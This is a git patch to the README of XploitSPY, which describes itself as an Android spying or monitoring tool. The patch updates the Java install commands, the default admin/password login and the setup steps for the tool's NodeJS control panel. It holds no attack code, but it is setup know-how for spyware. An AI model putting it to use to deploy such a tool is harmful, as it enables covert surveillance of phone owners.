From 17258303da2814fc58b68341cfa6fc522c05ea5e Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Wed, 22 Jan 2020 13:17:15 +0530 Subject: [PATCH] Update README.md --- README.md | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c25f6c6..1c31f8d 100644 --- a/README.md +++ b/README.md @@ -30,9 +30,9 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS ## Installation 1. Install JRE 9+ - Debian, Ubuntu, Etc - - `sudo apt-get install openjdk-9-jre` + - `sudo apt install openjdk-11-jre-headless` - Fedora, Oracle, Red Hat, etc - - `su -c "yum install java-1.9.0-openjdk"` + - `sudo yum install java-11-openjdk-devel"` - Windows - click [HERE](https://www.oracle.com/technetwork/java/javase/downloads/jre9-downloads-3848532.html) for downloads @@ -48,8 +48,10 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS - `npm install` <- install dependencies - `pm2 start index.js` <-- start the script - `pm2 startup` <- to run XploitSPY on startup + +6. Default Username : admin & Default Password : password -6. Set a Username & Password +7. Change the Username & Password 1. Stop XploitSPY `pm2 stop index` 2. Open `maindb.json` in a text editor 3. under `admin` @@ -58,7 +60,7 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 4. save the file 5. run `pm2 restart all` -7. in your browser navigate to `http://:22533` +8. in your browser navigate to `http://:22533` It's recommended to run XploitSPY behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/)